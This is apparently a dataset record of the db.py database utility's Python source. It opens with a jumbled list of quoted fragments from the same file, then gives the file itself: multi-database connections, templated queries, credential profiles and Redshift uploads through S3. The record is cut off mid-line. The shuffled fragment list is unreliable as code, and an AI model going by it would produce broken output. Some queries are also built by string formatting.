AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql", "| Column Name | Type | +---------------+---------------+---------+ | Album | AlbumId | INTEGER", "postgres, mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit:", "Python 3.3+ import uuid import re import os import sys from collections import", "tmp >>> results = db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_ >>>", "2 3 4 Let There Be Rock 1 4 5 Big Ones 3", "the s3 argument is a prefix, so it'll pick up # all of", "t.Name, ... t.UnitPrice ... FROM ... Album a ... INNER JOIN ... Track", "8 For Those About To Rock We Salute You 9 For Those About", "for all those doctests to be viable... -= if not, there's always a", "self.dbname = dbname self.dbtype = dbtype self.schemas = schemas self.limit = limit self.keys_per_column", "self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql", "elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg", "Query your database with a raw string. Parameters ---------- q: str Query string", "for t in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t,", "\"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name,", "unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for item in", "print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self,", "cols = [] for table in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col,", "[str(item) for item in query] if union==True: query = \"\\nUNION ALL\".join(query) else: query", "as pyo HAS_ODBC = True except ImportError: try: import pypyodbc as pyo HAS_ODBC", "table. Parameters ----------- search: str glob pattern for what you're looking for Examples", "on a.AlbumId = t.AlbumId; ... ''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\", "Salute You 1 1 2 Balls to the Wall 2 2 3 Restless", "pattern for what you're looking for Examples ---------- >>> from db import DemoDB", "TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self,", "# col metadata: format as list of tuples, to match how normal loading", "{ \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname,", "creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\"", "<NAME>, <NAME>, <NAME> 343719 11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0", "chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift", "None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select * from Track\",", "table df: DataFrame data frame you want to save to the db drop_if_exists:", "\"10.20.1.248\") port: int Port the database is running on. defaults to default port", "col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is not None and", "and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column Name | Type", "BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine", "not remove profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an", "sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\")", "\"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for", "ONLY if it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT", "limit: int, None Default number of records to return in a query. This", "ReportsTo | INTEGER | | Employee | EmployeeId | INTEGER | | Employee", "not \"UNION ALL\" handlebars templates. This will return any handlebars queries as a", "W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1", "Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql, &", "try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError: try: import", "col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column) and", "if not, there's always a random issue where rows are not in the", "TrackId Name AlbumId MediaTypeId \\ 0 1 For Those About To Rock (We", "Your password for the database hostname: str Hostname your database is running on", "# returns all tables containing trans >>> results = db.find_table(\"*\") # returns everything", "query_templates # attempt to import the relevant database libraries # TODO: maybe add", "need this, but if you're a db admin you might actually want to", "representation of all credentials for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename)", "CustomerId | INTEGER | | Employee | ReportsTo | INTEGER | | Employee", "3 Restless and Wild 2 3 4 Let There Be Rock 1 4", "# returns all columns ending w/ Id +---------------+---------------+---------+ | Table | Column Name", "way users with permission on specific buckets can use this feature bucket_name =", "See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data',", "str your aws access key. if this is None, the function will try", "self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables", "union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1 For Those About", "data] query = [str(item) for item in query] if union==True: query = \"\\nUNION", "= sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\")", "doctest, covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname':", "HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname =", "join all threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql =", "TrackId | INTEGER | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine", "Parameters ---------- name: str name for your shiny new table df: DataFrame data", "<NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0", "= True except ImportError: HAS_MYSQL = False try: import sqlite3 as sqlite HAS_SQLITE", "db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432,", "Salute You) 1 1 1 2 Balls to the Wall 2 2 2", "def tables(self): \"\"\"A lazy loaded reference to the table metadata for the DB.\"\"\"", "open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10)", "2 3 4 Restless and Wild 3 2 4 5 Princess of the", "if drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql +", "INTEGER | | Artist | ArtistId | INTEGER | | Customer | SupportRepId", "as e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback()", "glob pattern for what you're looking for Examples ---------- >>> from db import", "Up 0.99 7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks", "schema # 1. load directly from cache # 2. use a single query", "metadata. Please wait...\") for table in self._metadata_cache: # table metadata table_meta[table['name']] = {k:", "if it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\")", "AWS_SECRET_KEY: str your aws secrety key. if this is None, the function will", "len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format(", "# much faster when it comes time to run the \\COPY statment. #", "if use_cache: # generate our Tables, and load them into a TableSet self._tables", "chunk the file into pieces. according to amazon, this is # much faster", "system tables. limit: int, None Default number of records to return in a", ") ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except:", "except ImportError: HAS_PG = False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL =", "self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column,", "secrety key. if this is None, the function will try and grab AWS_SECRET_KEY", "n/a mssql: 1433 filename: str path to sqlite database dbname: str Name of", "w/ tmp >>> results = db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_", "foreign/ref key query by doing it one time, database-wide, if query is available", "tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table", "Type | +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) | | Genre |", "5 Princess of the Dawn 3 2 5 6 Put The Finger On", "relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load", "= self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def", "2 Track 3503 >>> q = ''' ... SELECT ... {{#cols}} ... {{#if", "sister from stealing your passwords. Parameters ---------- profile: str (optional) identifier/name for your", "0 0.99 1 0.99 db.query(\"select * from Track\", limit=10) TrackId Name AlbumId MediaTypeId", "dbname self.dbtype = dbtype self.schemas = schemas self.limit = limit self.keys_per_column = keys_per_column", "INTEGER | | Album | ArtistId | INTEGER | | Artist | ArtistId", "redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key import Key from boto.s3.connection import", "db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address that are varchars +----------+----------------+--------------+ |", "# all of the data*.gz files we've created sys.stderr.write(\"Copying data from s3 to", "cmd): try: self.cur.execute(cmd) except Exception as e: print (\"Error executing command:\") print (\"\\t", "are stored in ~/.db.py_{profile_name} and are a base64 encoded JSON file. This is", "\"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... ] >>> db.query(q, data=data) table_name", "def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables (at least ones that", "<PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\") for", "results = db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_ >>> results =", "the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None return", "\"\"\" Utility for exploring and querying a database. Parameters ---------- username: str Your", "= self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for item in data] query", "and username is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and", "db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql')", "(False) option for printing sql statement that will be executed bucket_location: boto.s3.connection.Location a", "in script. Parameters ---------- profile: str (optional) identifier/name for your database (i.e. \"dw\",", "# if boto is present, set the bucket_location to default. # we can't", "| | Artist | ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") #", "2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME>", "list of tuples if told to use cached metadata if use_cache and self._metadata_cache:", "a secure way to store sensitive data, but it will probably stop your", "a Shark 0.99 3 Restless and Wild 0.99 4 Princess of the Dawn", "db.py profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property", "default. # we can't do this in the function definition because we're #", "About To Rock (We Salute You) 1 1 1 2 Balls to the", "For Those About To Rock We Salute You 9 For Those About To", "return self.__str__() def __delete__(self): del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads", "| AlbumId | INTEGER | | Album | ArtistId | INTEGER | |", "and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three", "Type | +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Customer |", "Column, ColumnSet from .table import Table, TableSet from .s3 import S3 from .utils", "self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2 library. Please ensure", "| Name | NVARCHAR(120) | | MediaType | Name | NVARCHAR(120) | |", "| TrackId | INTEGER | | Track | AlbumId | INTEGER | |", "1 Balls to the Wall 2 Restless and Wild 3 Restless and Wild", "all tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\") # returns all tables", "Rock We Salute You 7 For Those About To Rock We Salute You", "= os.path.join(os.getcwd(), self.filename) else: db_filename = None return { \"username\": self.username, \"password\": self.password,", "from StringIO import StringIO # Python 2.7 except: from io import StringIO #", "an argument to `DB()`. None indicates that there will be no limit (That's", "for a given profile. Profiles are stored in ~/.db.py_{profile_name} and are a base64", "col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing", "data: list, dict Optional argument for handlebars-queries. Data will be passed to the", "value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC", "Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t,", "redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as", "framework), so we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema. This will take", "pd import pybars from .column import Column, ColumnSet from .table import Table, TableSet", "(3, 0)): q = unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query =", "\"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True)", "None) if tables: profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]] = profile", "return Examples ---------- >>> from db import DemoDB >>> db = DemoDB() >>>", "1 9 10 Evil Walks 1 1 GenreId Composer Milliseconds \\ 0 1", "Title, ArtistId | | Artist | ArtistId, Name | +--------+--------------------------+ >>> results =", "user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del self.cur del self.con def", "+----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address that are varchars +----------+----------------+--------------+", "10 Evil Walks 1 1 GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>,", "a base64 encoded JSON file. This is not to say this a secure", "str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID,", "table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT", "Restless and Wild 3 2 4 5 Princess of the Dawn 3 2", "= \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif", "1 2 Balls to the Wall 2 2 2 3 Fast As a", "you're looking for Examples ---------- >>> from db import DemoDB >>> db =", "for Examples ---------- >>> from db import DemoDB >>> db = DemoDB() >>>", "create them. \"\"\" sys.stderr.write(\"Indexing schema. This will take a second...\") rows_to_insert = []", "<NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>,", "= pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference to the table metadata", "The Finger On You 1 1 6 7 Let's Get It Up 1", "profile=\"default\"): \"\"\" Save your database credentials so you don't have to save them", "passing an argument to `DB()`. None indicates that there will be no limit", "for table in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) #", "data*.gz files we've created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql = \"\"\"", "# mssql else: if limit: q = \"select top {limit} * from ({q})", "use a single query for getting all key relationships # 3. use the", "\"\"\" user = os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID + name) else:", "optimize the foreign/ref key query by doing it one time, database-wide, if query", "as cnt ... FROM ... {{ name }} ... GROUP BY ... table_name", "8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with open(filename) as fp: q", "| | Playlist | Name | NVARCHAR(120) | | Track | Name |", "self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search through your database's", "the data*.gz files we've created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql =", "233926 7 1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102", "'name', 'foreign_keys', 'ref_keys')} # col metadata: format as list of tuples, to match", "re import os import sys from collections import defaultdict import pandas as pd", "mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL:", "host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not", "df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe", "isinstance(data, dict): query = template(data) query = str(query) else: return q return query", "sqlite library. Please ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor()", "<filename>IronManFly/storage/db/db.py import threading import glob import gzip try: from StringIO import StringIO #", "sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df = len(df) chunks = range(0, len_df,", "Address | NVARCHAR(70) | | Customer | SupportRepId | INTEGER | | Customer", "for your database (i.e. \"dw\", \"prod\") from db import DB import pymysql db", "col).type not in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols)", "def _assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite if self.dbtype in [\"postgres\",", "try: import pyodbc as pyo HAS_ODBC = True except ImportError: try: import pypyodbc", "| Employee | Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70)", "data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}',", "for any new tables and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables", "as a single data frame. limit: int Number of records to return Examples", "query def query(self, q, data=None, union=True, limit=None): \"\"\" Query your database with a", "... {{#if @last}} ... {{ . }} ... {{else}} ... {{ . }}", "except ImportError: try: import pypyodbc as pyo HAS_ODBC = True except ImportError: HAS_ODBC", "1433 elif profile is not None: pass else: raise Exception(\"Database type not specified!", "dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del self.cur del self.con def load_credentials(self,", "in self.cur: # second value in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel)", "Put The Finger On You 0.99 6 Let's Get It Up 0.99 7", "... t.Name, ... t.UnitPrice ... FROM ... Album a ... INNER JOIN ...", "str Your password for the database hostname: str Hostname your database is running", "an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column Name", "You 1 1 6 7 Let's Get It Up 1 1 7 8", "specify AWS_SECRET_KEY as either function argument or as an environment variable `AWS_SECRET_KEY`\") conn", "up # all of the data*.gz files we've created sys.stderr.write(\"Copying data from s3", "db. portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433 filename: str", "if tables: profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]] = profile return", "f = os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID + name)", "| CustomerId | INTEGER | | Invoice | BillingAddress | NVARCHAR(70) | |", "save to the db drop_if_exists: bool (False) whether you'd like to drop the", "= False try: import sqlite3 as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE", "str your aws secrety key. if this is None, the function will try", "boto.s3.key import Key from boto.s3.connection import Location # if boto is present, set", "library. Please ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable()", "here. if bucket_location is None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find", "\"\"\" with open(filename) as fp: q = fp.read() return self.query(q, data=data, union=union, limit=limit)", "except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object):", "looks for any new tables and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache)", "Location # if boto is present, set the bucket_location to default. # we", "it will probably stop your little sister from stealing your passwords. Parameters ----------", "You can override it by adding limit={X} to the `query` method, or by", "amazon, this is # much faster when it comes time to run the", "'{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';\") # find", "an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as", "http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df = len(df) chunks = range(0,", "= S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' %", "if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket", "database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in", "3 4331779 0.99 4 6290521 0.99 5 6713451 0.99 6 7636561 0.99 7", "not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in", "+-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/ Id +---------------+---------------+---------+ | Table |", "in ~/.db.py_{profile_name} and are a base64 encoded JSON file. This is not to", "if f: prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the", "if chunks = multiple-of-slices. Ex: DW1.XL nodes have 2 slices per node, so", "is used to control the rendering of PrettyTable a bit. None means that", "| | Employee | EmployeeId | INTEGER | | Employee | Address |", "\".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and querying a", "TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) #", "'', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname", "AlbumId, Title, ArtistId | | Artist | ArtistId, Name | +--------+--------------------------+ >>> results", "= dbname self.dbtype = dbtype self.schemas = schemas self.limit = limit self.keys_per_column =", "self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or", "INTEGER | | PlaylistTrack | TrackId | INTEGER | | PlaylistTrack | PlaylistId", "this is # much faster when it comes time to run the \\COPY", "column metadata for all tables as list of tuples if told to use", "data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some way for all those doctests", "in query] if union==True: query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif", "if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\") try: from boto.s3.connection import", "table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them into a TableSet", "isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur: #", "CustomerId | INTEGER | | InvoiceLine | TrackId | INTEGER | | InvoiceLine", "self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search through your database's schema for", "not in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if cache: self._metadata_cache =", "HAS_ODBC = False try: import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL =", "elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur", "perform the \\COPY here. the s3 argument is a prefix, so it'll pick", "| INTEGER | | InvoiceLine | TrackId | INTEGER | | InvoiceLine |", "\"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name,", "UnitPrice 0 For Those About To Rock (We Salute You) 0.99 1 Balls", "| MediaType | MediaTypeId | INTEGER | | Playlist | PlaylistId | INTEGER", "will try and grab AWS_SECRET_KEY from your environment variables s3: S3 alternative to", "Aggresively search through your database's schema for a column. Parameters ----------- search: str", "= DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db", "TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t", "exist. Could not find file {1}\".format(name, f)) os.remove(f) except Exception as e: raise", "\"INTEGER\"]).columns) 17 -= Should sort in some way for all those doctests to", "(False) whether you'd like to drop the table if it already exists chunk_size:", "a bit. None means that you'll have verrrrrrrry wide columns in some cases.", "\"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q = \"select * from ({q})", "to using keys, you can use an S3 object print_sql: bool (False) option", "False try: import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID", "all columns containing Address +----------+----------------+--------------+ | Table | Column Name | Type |", "port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\",", "all columns containing Address that are varchars +----------+----------------+--------------+ | Table | Column Name", "limit=1000, keys_per_column=None, driver=None, cache=False): if port is None: if dbtype==\"postgres\": port = 5432", "server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str = ((self.username and self.password) and", "= ''' ... SELECT ... '{{ name }}' as table_name, ... COUNT(*) as", "if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY =", "pandas and then adapt for redshift sql = pd.io.sql.get_schema(df, name) # defaults to", "self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit", "= \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict): query = template(data)", "= False try: import pyodbc as pyo HAS_ODBC = True except ImportError: try:", "= MySQLdb.connect HAS_MYSQL = True except ImportError: try: import pymysql mysql_connect = pymysql.connect", "in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}',", "''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM ... Album", "Up 1 1 7 8 Inject The Venom 1 1 8 9 Snowballed", "like your queries exclude_system_tables: bool Whether or not to include \"system\" tables (the", "the naive approach if use_cache: # generate our Tables, and load them into", "3 2 3 4 Restless and Wild 3 2 4 5 Princess of", "self.dbtype = dbtype self.schemas = schemas self.limit = limit self.keys_per_column = keys_per_column self.driver", "\\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue for (column_name, foreign_table, foreign_key)", "name, sql FROM sqlite_master where sql like '%REFERENCES%';\") # find for foreign keys", "You 7 For Those About To Rock We Salute You 8 For Those", "Parameters ---------- filename: str A SQL script data: list, dict Optional argument for", "9 10 Evil Walks 1 1 GenreId Composer Milliseconds \\ 0 1 <NAME>,", "'\\\\' in self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port)", "1433 filename: str path to sqlite database dbname: str Name of the database", "= dbtype self.schemas = schemas self.limit = limit self.keys_per_column = keys_per_column self.driver =", "in self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else:", "frame you want to save to the db drop_if_exists: bool (False) whether you'd", "feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else:", "= self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. Please", "to the db drop_if_exists: bool (False) whether you'd like to drop the table", "pieces. according to amazon, this is # much faster when it comes time", "db.query(\"select * from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1 For", "def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return prof.get('tables',", "KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if 